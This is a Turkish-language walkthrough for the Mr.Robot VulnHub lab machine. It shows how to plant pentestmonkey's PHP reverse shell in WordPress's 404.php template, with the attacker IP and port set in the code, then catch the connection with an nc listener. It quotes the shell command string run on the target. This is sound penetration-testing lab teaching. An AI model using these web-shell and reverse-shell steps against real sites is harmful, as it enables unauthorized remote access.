Not: Yazıda kullanılan Mr.Robot sanal makinesi Vulnhub sitesinden indirilebilir.
https://www.vulnhub.com/entry/mr-robot-1,151/
Mr.Robot zafiyetli sanal makineye ait WordPress yönetim arayüzünde açılan oturum aşağıdaki gibidir.
Bu uygulamaya yerleştirilecek arka kapıya ait kod internetten indirilebilir. Örnek olarak Pentestmonkey tarafından sunulan PHP dosyası kullanılabilir.
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
İndirilen dosya varsayılan hata sayfası olarak kullanılabilir. Bu amaçla 404.php dosyası değiştirilecektir.
Appearance > Editor > 404 Template
Sayfa içeri arka kapı içeren PHP içeriği ile değiştirilir.
Ayrıca kodun içeriğindeki IP ve port bilgisi saldırgana ait IP/port bilgisi olarak güncellenir. Sonrasında da “Update File” butonuna basılarak 404.php sayfası kaydedilir.
Not: Yukarıdaki ekran görüntüsünde de görüldüğü gibi, hedef sistemde çalışacak komutlar aşağıdaki gibidir.
$shell = ‘uname -a; w; id; /bin/sh -i’;
Arka kapı çalıştığında bağlantının kurulacağı saldırgana ait sistemde de bu bağlantı yakalanmalıdır. Bu amaçla nc aracı kullanılabilir.
nc -nlvp 443
Uygulamanın hata vermesi sağlandığında varsayılan hata sayfası (404.php) çağırılacak ve arka kapının içerisindeki kodlar çalışacaktır.
Kaynak: